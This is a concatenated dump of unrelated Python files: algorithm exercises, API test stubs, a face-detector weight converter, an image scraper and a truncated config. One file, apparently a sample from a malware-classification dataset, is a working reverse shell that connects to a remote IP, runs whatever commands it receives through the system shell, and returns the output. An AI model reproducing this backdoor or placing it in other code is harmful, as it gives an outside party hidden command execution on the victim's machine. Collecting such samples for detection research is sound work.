|
Python
| false | false | 3,454 |
py
|
"""
308. Range Sum Query 2D - Mutable
Given a 2D matrix matrix, find the sum of the elements inside the rectangle defined by its upper left corner (row1, col1) and lower right corner (row2, col2).
The above rectangle (with the red border) is defined by (row1, col1) = (2, 1) and (row2, col2) = (4, 3), which contains sum = 8.
Example:
Given matrix = [
[3, 0, 1, 4, 2],
[5, 6, 3, 2, 1],
[1, 2, 0, 1, 5],
[4, 1, 0, 1, 7],
[1, 0, 3, 0, 5]
]
sumRegion(2, 1, 4, 3) -> 8
update(3, 2, 2)
sumRegion(2, 1, 4, 3) -> 10
Note:
The matrix is only modifiable by the update function.
You may assume the number of calls to update and sumRegion function is distributed evenly.
You may assume that row1 ≤ row2 and col1 ≤ col2.
"""
"""
Similar problem: 304 Range Sum Query 2D - Immutable
Use Binary Index Tree (BIT) to quickly get the sum of the rectangle area from (0, 0) to (row, col), inclusive
"""
import unittest
class NumMatrix:
def __init__(self, matrix):
self.M = len(matrix)
self.N = len(matrix[0]) if self.M > 0 else 0
self.mat = [[0]*self.N for _ in range(self.M)] # (M)*(N) matrix that stores current value (update method may change value)
self.bit = [[0]*(self.N+1) for _ in range(self.M+1)] # (M+1)*(N+1) matrix that represents a 2-D BIT
# use update method to create the 2-D BIT
for i in range(self.M):
for j in range(self.N):
self.update(i, j, matrix[i][j])
def update(self, row: int, col: int, val: int) -> None:
if -1 < row < self.M and -1 < col < self.N:
diff = val - self.mat[row][col]
self.mat[row][col] = val
i = row + 1 # mat has 0-based index and BIT has 1-based index. Pitfall: don't initialize j to (col + 1) here
while i < self.M + 1:
j = col + 1
while j < self.N + 1:
self.bit[i][j] += diff
j += j & (-j)
i += i & (-i)
def getSum(self, row: int, col: int) -> int:
"""
sum of the rectangle area from (0, 0) to (row, col), exclusive row & col
"""
res = 0
if -1 < row - 1 < self.M and -1 < col - 1 < self.N:
i = row
while i > 0:
j = col
while j > 0:
res += self.bit[i][j]
j -= j & (-j)
i -= i & (-i)
return res
def sumRegion(self, row1: int, col1: int, row2: int, col2: int) -> int:
return self.getSum(row2+1, col2+1)\
- self.getSum(row2+1, col1)\
- self.getSum(row1, col2+1)\
+ self.getSum(row1, col1)
# Your NumMatrix object will be instantiated and called as such:
# obj = NumMatrix(matrix)
# obj.update(row,col,val)
# param_2 = obj.sumRegion(row1,col1,row2,col2)
class Test(unittest.TestCase):
def test_1(self):
matrix = [[3, 0, 1, 4, 2],\
[5, 6, 3, 2, 1],\
[1, 2, 0, 1, 5],\
[4, 1, 0, 1, 7],\
[1, 0, 3, 0, 5]]
#matrix = [[3, 0], [5, 6]]
m = NumMatrix(matrix)
self.assertEqual(14, m.getSum(2, 2))
self.assertEqual(8, m.sumRegion(2, 1, 4, 3))
m.update(3, 2, 2)
self.assertEqual(10, m.sumRegion(2, 1, 4, 3))
if __name__ == "__main__":
unittest.main(exit = False)
|
[
"[email protected]"
] | |
4125a3a6906417841daee6699df1daa262068870
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03069/s036551857.py
|
273e2d32d2871800eb6b588af947e2fe9c71f0b3
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 269 |
py
|
import sys,math,collections,itertools
input = sys.stdin.readline
N = int(input())
s = input().rstrip()
cntb =0
cntw = s.count('.')
ans =cntw
for i in range(len(s)):
if s[i] == '#':
cntb +=1
else:
cntw -=1
ans = min(ans,cntb+cntw)
print(ans)
|
[
"[email protected]"
] | |
f6bdf4d9d98945b174ea3626cac9c7f21706ba7e
|
73e939e797cc28aa33a4f55c234237c47167033e
|
/test/test_transaction_summary.py
|
b5bc1ae60e987c82adcad1bf24cbb8c6ef351245
|
[] |
no_license
|
dmlerner/ynab-api
|
b883a086e6ce7c5d2bdb5b17f3f0a40dbb380046
|
df94b620d9ec626eacb9ce23bfd313f1c589b03a
|
refs/heads/master
| 2023-08-17T14:22:17.606633 | 2023-07-03T17:05:16 | 2023-07-03T17:05:16 | 223,287,209 | 27 | 13 | null | 2023-08-05T18:58:58 | 2019-11-21T23:58:22 |
Python
|
UTF-8
|
Python
| false | false | 975 |
py
|
"""
YNAB API Endpoints
Our API uses a REST based design, leverages the JSON data format, and relies upon HTTPS for transport. We respond with meaningful HTTP response codes and if an error occurs, we include error details in the response body. API Documentation is at https://api.youneedabudget.com # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import ynab_api
from ynab_api.model.transaction_summary import TransactionSummary
class TestTransactionSummary(unittest.TestCase):
"""TransactionSummary unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testTransactionSummary(self):
"""Test TransactionSummary"""
# FIXME: construct object with mandatory attributes with example values
# model = TransactionSummary() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
0fb0c324b7732ab490a71f2d069eca7673a43eb2
|
7a87119ef5d77a1b225aab45083a45dcd376684c
|
/6_palindroom.py
|
b71f3511d35f1b2ab48041d139ac45ce6325a707
|
[] |
no_license
|
astilleman/MI
|
0e31e0f4098502e83a13805feae82e038c169bb7
|
1564fd28f759761c3e186d41107c9abff3b69070
|
refs/heads/master
| 2023-03-29T19:14:46.817308 | 2021-04-06T15:43:17 | 2021-04-06T15:43:17 | 337,495,283 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,100 |
py
|
"""
Een palindroom is een string die hetzelfde leest van links naar
rechts, als omgekeerd. Enkele voorbeelden van palindromen zijn:
- kayak
- racecar
- was it a cat I saw
Schrijf een recursieve functie die een string vraagt aan de gebruiker en
nakijkt of deze string al dan niet een palindroom is. Indien de
ingevoerde string een palindroom is, moet de functie True teruggeven,
anders geeft de functie False terug.
Je mag ervan uitgaan dat de gegeven string geen spaties bevat.
Let op: Zorg ervoor dat je functie niet hoofdlettergevoelig is.
"""
def is_palindroom(string):
result = True
if string == "":
exit()
if string[0] != string[-1]:
result = False
else:
result = is_palindroom(string[1:len(string)])
return result
# TESTS
assert is_palindroom("")
assert is_palindroom("a")
assert is_palindroom("aa")
assert not is_palindroom("ab")
assert is_palindroom("aba")
assert not is_palindroom("aab")
assert is_palindroom("kayak")
assert not is_palindroom("racehorse")
assert is_palindroom("racecar")
assert is_palindroom("wasitacatIsaw")
|
[
"[email protected]"
] | |
174e5543c3d14be2f7973435e139bd2bb9bc19b5
|
ef2f932655e4591c4f654431cd96eedd0af2b5ba
|
/tests/example.py
|
b717490fbd69d71977bed6f795fb9a7c57e8a744
|
[
"MIT"
] |
permissive
|
cair/hex-ai
|
b380447c6dd445452c161babefdfadf329e899fa
|
70c134a1479b58634e62c845314c7536ad64e4be
|
refs/heads/master
| 2021-08-03T02:37:13.928443 | 2021-07-26T19:58:51 | 2021-07-26T20:02:29 | 209,273,454 | 0 | 0 |
MIT
| 2021-04-19T17:44:02 | 2019-09-18T09:46:06 |
C
|
UTF-8
|
Python
| false | false | 540 |
py
|
from PyHex import Hex11 as Hex
if __name__ == "__main__":
hg = Hex.HexGame()
winner = -1
for game in range(10000000):
Hex.init(hg)
player = 0
while Hex.full_board(hg) == 0:
position = Hex.place_piece_randomly(hg, player)
if Hex.winner(hg, player, position):
winner = player
break
player = 1 - player
if hg.number_of_open_positions >= 75:
print("\nPlayer %s wins!\n\n" % (winner, ))
Hex.print(hg)
|
[
"[email protected]"
] | |
66eef6585fd94f0ceff511a5bcdfafdbbc1d0330
|
b580fd482147e54b1ca4f58b647fab016efa3855
|
/host_im/mount/malware-classification-master/samples/virus/sample_bad382.py
|
9b733b70a15ec41b80a16eccdf59369f39e4f4a9
|
[] |
no_license
|
Barnsa/Dissertation
|
1079c8d8d2c660253543452d4c32799b6081cfc5
|
b7df70abb3f38dfd446795a0a40cf5426e27130e
|
refs/heads/master
| 2022-05-28T12:35:28.406674 | 2020-05-05T08:37:16 | 2020-05-05T08:37:16 | 138,386,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 318 |
py
|
import bz2
import threading
import socket
import subprocess
import lzma
import hashlib
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("175.20.0.200",8080))
while not False:
command = s.recv(1024).decode("utf-8")
if not command: break
data = subprocess.check_output(command, shell=True)
s.send(data)
|
[
"[email protected]"
] | |
b10302ab2daca47e9bd8afe17228e2f901d2976a
|
d00b1e01f82076248eb07d6391fafabfbac74898
|
/metadata/FrostNumber/hooks/pre-stage.py
|
7f090d9c2b69e9473bb79627b7d4db1dbab856b5
|
[
"MIT"
] |
permissive
|
csdms/wmt-metadata
|
9b922415faa397e3d5511f258e1a4fda846b78b7
|
39207acc376f1cd21b2ae1d5581a1e2c317a6441
|
refs/heads/master
| 2020-04-07T00:39:56.268862 | 2019-02-26T21:24:20 | 2019-02-26T21:24:20 | 51,040,972 | 0 | 0 |
MIT
| 2018-10-31T19:36:54 | 2016-02-04T00:23:47 |
Python
|
UTF-8
|
Python
| false | false | 769 |
py
|
"""A hook for modifying parameter values read from the WMT client."""
import os
import shutil
from wmt.utils.hook import find_simulation_input_file, yaml_dump
from topoflow_utils.hook import assign_parameters
file_list = []
def execute(env):
"""Perform pre-stage tasks for running a component.
Parameters
----------
env : dict
A dict of component parameter values from WMT.
"""
env['end_year'] = long(env['start_year']) + long(env['_run_duration']) - 1
env['fn_out_filename'] = 'frostnumber_output.dat'
assign_parameters(env, file_list)
for fname in file_list:
src = find_simulation_input_file(env[fname])
shutil.copy(src, os.curdir)
env['_file_list'] = file_list
yaml_dump('_env.yaml', env)
|
[
"[email protected]"
] | |
a296c689355de9ff44465c89010087d206693bda
|
e15d63ccde04e7458bff5af1bdad63a5c699b489
|
/example/Model_Conversion/mx2torch/retinaface_r50/res50_transfer_weight.py
|
17e4e530621f5d1100de117f9e520503564c3aba
|
[
"WTFPL"
] |
permissive
|
ddddwee1/TorchSUL
|
775b6a2b1e4ab7aac25a3f0411de83affc257af5
|
6c7cd41b14fc8b746983e8b981d1ba4d08370ca2
|
refs/heads/master
| 2023-08-21T15:21:24.131718 | 2023-08-18T09:37:56 | 2023-08-18T09:37:56 | 227,628,298 | 13 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,870 |
py
|
import numpy as np
from TorchSUL import Model as M
import torch
import torch.nn as nn
import torch.nn.functional as F
class Unit(M.Model):
def initialize(self, chn, stride=1, shortcut=False):
self.bn0 = M.BatchNorm()
self.act = M.Activation(M.PARAM_RELU)
self.c1 = M.ConvLayer(1, chn, activation=M.PARAM_RELU, batch_norm=True, usebias=False)
self.c2 = M.ConvLayer(3, chn, stride=stride, activation=M.PARAM_RELU, batch_norm=True, usebias=False)
self.c3 = M.ConvLayer(1, chn*4, usebias=False)
self.shortcut = shortcut
if shortcut:
self.sc = M.ConvLayer(1, chn*4, stride=stride, usebias=False)
def forward(self, inp):
if self.shortcut:
inp = self.bn0(inp)
inp = self.act(inp)
x2 = x = self.c1(inp)
x = self.c2(x)
x = self.c3(x)
sc = self.sc(inp)
x = sc + x
else:
x = self.bn0(inp)
x = self.act(x)
x2 = x = self.c1(x)
x = self.c2(x)
x = self.c3(x)
x = inp + x
return x, x2
class Stage(M.Model):
def initialize(self, outchn, num_units, stride):
self.units = nn.ModuleList()
for i in range(num_units):
self.units.append(Unit(outchn, stride=stride if i==0 else 1, shortcut = i==0))
def forward(self, x):
for i,u in enumerate(self.units):
if i==0:
x, x2 = u(x)
else:
x, _ = u(x)
return x, x2
class DETHead(M.Model):
def initialize(self):
self.c11 = M.ConvLayer(3, 256, batch_norm=True)
self.c21 = M.ConvLayer(3, 128, batch_norm=True, activation=M.PARAM_RELU)
self.c22 = M.ConvLayer(3, 128, batch_norm=True)
self.c31 = M.ConvLayer(3, 128, batch_norm=True, activation=M.PARAM_RELU)
self.c32 = M.ConvLayer(3, 128, batch_norm=True)
self.act = M.Activation(M.PARAM_RELU)
def forward(self, x):
x1 = self.c11(x)
x2 = self.c21(x)
x3 = self.c31(x2)
x3 = self.c32(x3)
x2 = self.c22(x2)
x = torch.cat([x1, x2, x3], dim=1)
x = self.act(x)
return x
class RegressHead(M.Model):
def initialize(self):
self.c1 = M.ConvLayer(1,4)
self.c2 = M.ConvLayer(1,8)
self.c3 = M.ConvLayer(1,20)
def forward(self, x):
prob = self.c1(x)
bbox = self.c2(x)
kpts = self.c3(x)
prob = prob.view(prob.shape[0],2,prob.shape[2]*2,prob.shape[3])
prob = F.softmax(prob, dim=1)
prob = prob.view(prob.shape[0],4,-1, prob.shape[3])
return prob, bbox, kpts
class Detector(M.Model):
def initialize(self):
self.bn0 = M.BatchNorm()
self.c1 = M.ConvLayer(7, 64, stride=2, activation=M.PARAM_RELU, batch_norm=True, usebias=False)
self.pool = M.MaxPool2D(3, 2)
self.stage1 = Stage(64, num_units=3, stride=1)
self.stage2 = Stage(128, num_units=4, stride=2)
self.stage3 = Stage(256, num_units=6, stride=2)
self.stage4 = Stage(512, num_units=3, stride=2)
self.bn1 = M.BatchNorm()
self.act = M.Activation(M.PARAM_RELU)
self.ssh_c3_lateral = M.ConvLayer(1, 256, batch_norm=True, activation=M.PARAM_RELU)
self.det3 = DETHead()
self.head32 = RegressHead()
self.ssh_c2_lateral = M.ConvLayer(1, 256, batch_norm=True, activation=M.PARAM_RELU)
self.ssh_c3_upsampling = M.NNUpSample(2)
self.ssh_c2_aggr = M.ConvLayer(3, 256, batch_norm=True, activation=M.PARAM_RELU)
self.det2 = DETHead()
self.head16 = RegressHead()
self.ssh_m1_red_conv = M.ConvLayer(1, 256, batch_norm=True, activation=M.PARAM_RELU)
self.ssh_c2_upsampling = M.NNUpSample(2)
self.ssh_c1_aggr = M.ConvLayer(3, 256, batch_norm=True, activation=M.PARAM_RELU)
self.det1 = DETHead()
self.head8 = RegressHead()
def forward(self, x):
x = self.bn0(x)
x = self.c1(x)
x = self.pool(x)
x, _ = self.stage1(x)
x, _ = self.stage2(x)
x, f1 = self.stage3(x)
x, f2 = self.stage4(x)
x = self.bn1(x)
x = self.act(x)
fc3 = x = self.ssh_c3_lateral(x)
d3 = x = self.det3(x)
scr32, box32, lmk32 = self.head32(d3)
fc2 = self.ssh_c2_lateral(f2)
x = self.ssh_c3_upsampling(fc3)
x = x[:,:,:fc2.shape[2],:fc2.shape[3]]
plus100 = x = fc2 + x
fc2_aggr = x = self.ssh_c2_aggr(x)
d2 = x = self.det2(x)
scr16, box16, lmk16 = self.head16(d2)
fc1 = self.ssh_m1_red_conv(f1)
x = self.ssh_c2_upsampling(fc2_aggr)
x = x[:,:,:fc1.shape[2],:fc1.shape[3]]
x = fc1 + x
fc1_aggr = x = self.ssh_c1_aggr(x)
d1 = x = self.det1(x)
scr8, box8, lmk8 = self.head8(d1)
results = [scr32, box32, lmk32, scr16, box16, lmk16, scr8, box8, lmk8]
return results
if __name__=='__main__':
net = Detector()
net.eval()
x = torch.from_numpy(np.ones([1,3,640,640]).astype(np.float32))
_ = net(x)
# net.bn_eps(1e-5)
# net.backbone.det1.bn_eps(2e-5)
res = {}
ps = net.named_parameters()
for p in ps:
name, p = p
res[name] = p
ps = net.named_buffers()
for p in ps:
name, p = p
res[name] = p
def get_bn(l1, l2):
a = []
b = []
a.append(l1+'.weight')
a.append(l1+'.bias')
a.append(l1+'.running_mean')
a.append(l1+'.running_var')
b.append(l2+'_gamma')
b.append(l2+'_beta')
b.append(l2+'_moving_mean')
b.append(l2+'_moving_var')
return a, b
def get_conv(l1, l2, bias=False):
a = [l1 + '.weight']
b = [l2 + '_weight']
if bias:
a.append(l1+'.bias')
b.append(l2+'_bias')
return a,b
def get_layer(l1, l2, bias=False):
res = []
res.append(get_conv(l1 + '.conv', l2%('conv')))
res.append(get_bn(l1 + '.bn', l2%('batchnorm')))
return res
def get_convbn(l1, l2, bias=False):
res = []
res.append(get_conv(l1 + '.conv', l2, bias=bias))
res.append(get_bn(l1 + '.bn', l2 + '_bn'))
return res
def get_unit(l1, l2, sc=False):
res = []
res.append(get_bn(l1+'.bn0', l2+'_bn1'))
res.append(get_conv(l1+'.c1.conv', l2+'_conv1'))
res.append(get_bn(l1+'.c1.bn', l2+'_bn2'))
res.append(get_conv(l1+'.c2.conv', l2+'_conv2'))
res.append(get_bn(l1+'.c2.bn', l2+'_bn3'))
res.append(get_conv(l1+'.c3.conv', l2+'_conv3'))
if sc:
res.append(get_conv(l1+'.sc.conv', l2+'_sc'))
return res
def get_stage(l1, l2, blocknum):
res = []
for i in range(blocknum):
res += get_unit(l1+'.units.%d'%i, l2+'_unit%d'%(i+1), sc= i==0)
return res
def get_dethead(l1, l2):
res = []
res += get_convbn(l1+'.c11', l2+'_conv1', bias=True)
res += get_convbn(l1+'.c21', l2+'_context_conv1', bias=True)
res += get_convbn(l1+'.c22', l2+'_context_conv2', bias=True)
res += get_convbn(l1+'.c31', l2+'_context_conv3_1', bias=True)
res += get_convbn(l1+'.c32', l2+'_context_conv3_2', bias=True)
return res
def get_regress(l1, l2):
res = []
res.append(get_conv(l1+'.c1.conv', l2%('cls_score'), bias=True))
res.append(get_conv(l1+'.c2.conv', l2%('bbox_pred'), bias=True))
res.append(get_conv(l1+'.c3.conv', l2%('landmark_pred'), bias=True))
return res
def totonoi(l):
# print(l)
a = []
b = []
for i in l:
a += i[0]
b += i[1]
return a,b
l = []
l.append(get_bn('bn0', 'bn_data'))
l.append(get_conv('c1.conv', 'conv0'))
l.append(get_bn('c1.bn', 'bn0'))
l += get_stage('stage1', 'stage1', 3)
l += get_stage('stage2', 'stage2', 4)
l += get_stage('stage3', 'stage3', 6)
l += get_stage('stage4', 'stage4', 3)
l.append(get_bn('bn1', 'bn1'))
l += get_convbn('ssh_c3_lateral', 'ssh_c3_lateral', bias=True)
l += get_dethead('det3', 'ssh_m3_det')
l += get_regress('head32', 'face_rpn_%s_stride32')
l += get_convbn('ssh_c2_lateral', 'ssh_c2_lateral', bias=True)
l += get_convbn('ssh_c2_aggr', 'ssh_c2_aggr', bias=True)
l += get_dethead('det2', 'ssh_m2_det')
l += get_regress('head16', 'face_rpn_%s_stride16')
l += get_convbn('ssh_m1_red_conv', 'ssh_m1_red_conv', bias=True)
l += get_convbn('ssh_c1_aggr', 'ssh_c1_aggr', bias=True)
l += get_dethead('det1', 'ssh_m1_det')
l += get_regress('head8', 'face_rpn_%s_stride8')
a,b = totonoi(l)
# print(a,b)
import source
for i,j in zip(a,b):
# print(i,j)
value = source.res[j].asnumpy()
# print(value.shape)
# print(res[i].shape)
res[i].data[:] = torch.from_numpy(value)[:]
# net.bn_eps(2e-5)
y = net(x)
print(y[0])
print(y[0].shape)
M.Saver(net).save('./model_r50/r50_retina.pth')
|
[
"[email protected]"
] | |
46bd95d09f6bc8aecede6db2b326fc90533f3af9
|
45467e07e77131f631d0865046dcc4d18f483601
|
/src/Hackerearth/round_2/A.py
|
a766bae20c7b6478ffb22d212ff53cd5256fddb7
|
[] |
no_license
|
bvsbrk/Algos
|
98374e094bd3811579276d25a82bbf2c0f046d96
|
cbb18bce92054d57c0e825069ef7f2120a9cc622
|
refs/heads/master
| 2021-09-25T10:01:59.323857 | 2018-10-20T16:07:07 | 2018-10-20T16:07:07 | 98,708,839 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 805 |
py
|
if __name__ == '__main__':
for _ in range(int(input().strip())):
n = int(input().strip())
x = n
arr = [int(i) for i in input().strip().split()]
arr = arr[::-1]
i = 0
while arr[i] == 0 and i < n:
i += 1
x -= 1
if i == n - 1:
print(0)
else:
ans = []
if arr[i] > 0:
ans.append(1)
else:
ans.append(-1)
# neg sgn
if n % 2 == 0:
if arr[i] > 0:
ans.append(1)
else:
ans.append(-1)
else:
if arr[i] < 0:
ans.append(1)
else:
ans.append(-1)
print(*ans)
|
[
"[email protected]"
] | |
6ce151591e20779df71ce25110bc3831ce51c59a
|
b792f600ed4e50f34e65e4f334cf7a32d319cc0e
|
/2017/day11.py
|
cf2d1b7780f769b1e96bacb18b46b9ecb825122d
|
[] |
no_license
|
daniel70/AoC
|
d577f490559d4a0f0d24567bd796117e1aac94ec
|
ef704a4f6e90168cdc2a91e894583a96e9a6c371
|
refs/heads/master
| 2022-12-28T03:19:08.341913 | 2022-12-16T01:52:39 | 2022-12-18T01:30:50 | 224,876,724 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 711 |
py
|
directions = {
'n': (0, 1),
'ne': (1, 0.5),
'se': (1, -0.5),
's': (0, -1),
'sw': (-1, -0.5),
'nw': (-1, 0.5),
}
def distance(instructions: list[str]) -> tuple[int, int]:
origin = [0, 0]
furthest = 0
for direction in instructions:
dx, dy = directions[direction]
origin[0] += dx
origin[1] += dy
x, y = origin
furthest = max(furthest, abs(x) + max(int(abs(y)) - abs(x) // 2, 0))
steps = abs(x) + max(int(abs(y)) - abs(x) // 2, 0)
return steps, furthest
instructions = open("input11.txt").read().strip().split(",")
answer1, answer2 = distance(instructions=instructions)
print("answer 1:", answer1)
print("answer 2:", answer2)
|
[
"[email protected]"
] | |
5432391a83b8c960663d3cef2f2aa55994ff307a
|
c4bfd8ba4c4c0f21bd6a54a9131f0985a5a4fa56
|
/crescent/functions/get_att.py
|
704a83a8c9e664be800a85836e5778252c98e7a2
|
[
"Apache-2.0"
] |
permissive
|
mpolatcan/crescent
|
405936ec001002e88a8f62d73b0dc193bcd83010
|
2fd0b1b9b21613b5876a51fe8b5f9e3afbec1b67
|
refs/heads/master
| 2022-09-05T04:19:43.745557 | 2020-05-25T00:09:11 | 2020-05-25T00:09:11 | 244,903,370 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 528 |
py
|
from .fn import Fn as AnyFn, FnArrayValue
from typing import Union
class GetAtt(FnArrayValue):
def __init__(self):
super(GetAtt, self).__init__(
fn_name=GetAtt.__name__,
field_order=[self.Resource.__name__, self.Attribute.__name__]
)
def Resource(self, resource_id: Union[str, AnyFn]):
return self._set_field(self.Resource.__name__, resource_id)
def Attribute(self, attribute: Union[str, AnyFn]):
return self._set_field(self.Attribute.__name__, attribute)
|
[
"[email protected]"
] | |
6e3877952188cded94c414eb37f6d19ebeb95534
|
5462142b5e72cb39bea5b802dd46f55357c4ea84
|
/test_pic/vmgirls/dl_vmgirls_pic.py
|
499ac3f8cef5a386fe97d91b59fd55f04f358de3
|
[] |
no_license
|
qqmadeinchina/myhomeocde
|
a0996ba195020da9af32613d6d2822b049e515a0
|
291a30fac236feb75b47610c4d554392d7b30139
|
refs/heads/master
| 2023-03-23T05:28:53.076041 | 2020-08-24T08:39:00 | 2020-08-24T08:39:00 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,874 |
py
|
# -*- coding: utf-8 -*-
# @time :2020/8/17 9:56
# @Author:老萝卜
# @file:dl_vmgirls_pic
# @Software:%{PRODUICT_NAME}
'''
爬取https://www.vmgirls.com/所有图片
'''
import time
import requests
from lxml import etree
import os
import json
basepath_picsave="e:\\temp\\pythontest\\vmgirls\\"
headers={
"user-agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36"
}
sysdatetime=time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))
sysdate=time.strftime('%Y-%m-%d',time.localtime(time.time()))
systime=time.strftime('%H:%M:%S',time.localtime(time.time()))
sysdatetime_compact==time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
# 保存文本内容
def save_html(content,path,oprtye="a",encode="utf-8"):
with open(path,oprtye,encoding=encode) as file:
file.write(content)
# 第一步,请求网络 - 获取网络返回的数据
def get_page(url,encode="utf-8"):
html = requests.get(url,headers=headers).content.decode(encode) # 需要打开网站的编码格式,把拿到的数据进行解码,否m则出现乱码
return html
# 解析数据首页
def xpath_toppage(response):
pageslist=[]
html=etree.HTML(response)
# a_list=html.xpath("/a")
# # 将<a></a>信息保存
# temp_list=[]
# for item in a_list:
# str0=etree.tostring(item,encoding="utf-8").decode("utf-8")
# temp_list.append(str0)
# temp_str="\n".join(temp_list)
# save_html(temp_str,"page_a_content.txt","w")
urllist=html.xpath("//a[@class='media-content']/@href")
for url in urllist:
newurl = "https://www.vmgirls.com/" + url
if newurl not in pageslist:
pageslist.append(newurl)
return pageslist
# 创建目录
def createdir(dir_name):
if not os.path.exists(dir_name):
os.mkdir(dir_name)
# 解析每个人的页面
def xpath_pages(response):
pagelist = []
html = etree.HTML(response)
title=html.xpath("//h1[@class='post-title h3']/text()")[0]
author=html.xpath("//a[@class='author-popup']/text()")
# urllist=html.xpath("//a[class='nc-light-gallery-item']/@href")
urllist=html.xpath(f"//a[@title='{title}']/@href")
# print("author=",author)
# print("urllist=",urllist)
savepath=basepath_picsave+title+"\\"
createdir(savepath)
return (savepath,urllist)
def savepic(filepath,url):
req = requests.get(url,headers=headers)
with open(filepath, "wb") as file:
file.write(req.content)
def savejson(data,filepath,oprtype="a",encode="utf-8"):
with open(filepath,oprtype,encoding=encode) as fjson:
json.dump(data,fjson,)
def main():
url="https://www.vmgirls.com/"
response=get_page(url)
save_html(response,f".\\www.vmgirls.com.{sysdate}.html","w")
if response=="":
print("网页打开失败")
return
pageslist=xpath_toppage(response)
# print("pageslist=",pageslist)
picurllist=[]
for picsurl in pageslist:
resp = get_page(picsurl)
save_html(resp,"1.html","w")
picpath,urllist=xpath_pages(resp)
# print("urllist=",urllist)
for picurl in urllist:
filename=picpath+picurl.split("/")[-1]
picurl1="https://www.vmgirls.com/"+picurl
picurllist.append((filename,picurl1))
# print("picurllist=", picurllist)
# print("(filename,picurl1)=",filename,picurl1)
# print("picurllist=",picurllist)
# temp_str="\n".join(picurllist)
# save_html(temp_str,"urllist","w")
savejson(picurllist,f"picurllist_{sysdatetime_compact}.json","w")
# with open("picurllist.json","r") as fjson:
# data=json.load(fjson)
# print("data=",data)
for filepath,pic_url in picurllist:
savepic(filepath,pic_url)
if __name__=="__main__":
main()
|
[
"[email protected]"
] | |
8114f87ea4d123ce369f1ad9b8352b6eaf865dbf
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03208/s325634445.py
|
323b17ee4ad8a29bda1ed175bcbbe1278f12231d
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 240 |
py
|
def resolve():
n, k = map(int, input().split())
H_sort = list(sorted([int(input()) for _ in range(n)],reverse=True))
ans = 10**9
for i in range(n-k+1):
ans = min(ans, H_sort[i]-H_sort[i+k-1])
print(ans)
resolve()
|
[
"[email protected]"
] | |
e2bd9a59636cfd0c2f76a1a4087cc2c5202b1935
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/216/usersdata/274/113966/submittedfiles/av2_p3_civil.py
|
d9f4bcefea50acc8b1dd920d630cdd854f8a3254
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 458 |
py
|
# -*- coding: utf-8 -*-
import numpy as np
L=int(input("Quantidade de Linhas: "))
C=L
a=np.zeros((L,C))
x=int(input("Linhas: "))
y=int(input("Colunas: "))
for i in range(0,a.shape[0],1):
for j in range(0,a.shape[1],1):
a[i,j]=float(input("Valor da Linha: "))
soma1L=0
for i in range(x,C-y,1):
soma1L=soma1L+a[x,i+1]
soma2L=0
for i in range(x,y,1):
soma2L=soma2L+a
soma1C=0
for i in range(x,C-y,1):
soma1C=soma1C+a[x,i+1]
|
[
"[email protected]"
] | |
fe03327e97fff1983eaee4dd0427062b9d600377
|
05cda3ab89d001aef2ec19f2975fad9397c8dd0b
|
/experiments/sawyer/towel_classifier/conf.py
|
bec399b3897f8ecb885707dcf2e8c6335cc1ab37
|
[
"MIT"
] |
permissive
|
dhl8282/visual_foresight
|
ddcc940ad542222d433ca269e37e4d5f747732ea
|
5e6205a85119c1dec4a39ba7e67d7c89e726a47c
|
refs/heads/master
| 2022-09-05T18:16:07.590072 | 2020-05-26T08:41:52 | 2020-05-26T08:41:52 | 266,988,765 | 0 | 0 |
MIT
| 2020-05-26T08:36:22 | 2020-05-26T08:36:22 | null |
UTF-8
|
Python
| false | false | 988 |
py
|
from visual_mpc.video_prediction.setup_predictor import setup_predictor
from visual_mpc.video_prediction.vpred_model_interface import VPred_Model_Interface
from video_prediction.models.savp_model import SAVPVideoPredictionModel
import robonet
modeldir = '/home/sudeep/Documents/video_prediction/pretrained_models/mixed_datasets/towel_hard_objects/view0/'
configuration = {
'pred_model': VPred_Model_Interface,
'pred_model_class': SAVPVideoPredictionModel,
'setup_predictor':setup_predictor,
'json_dir': modeldir + '/model.savp.None',
'pretrained_model':modeldir + '/model.savp.None/model-300000', # 'filepath of a pretrained model to resume training from.' ,
'sequence_length': 15, # 'sequence length to load, including context frames.' ,
'context_frames': 2, # of frames before predictions.' ,
'model': 'appflow', #'model architecture to use - CDNA, DNA, or STP' ,
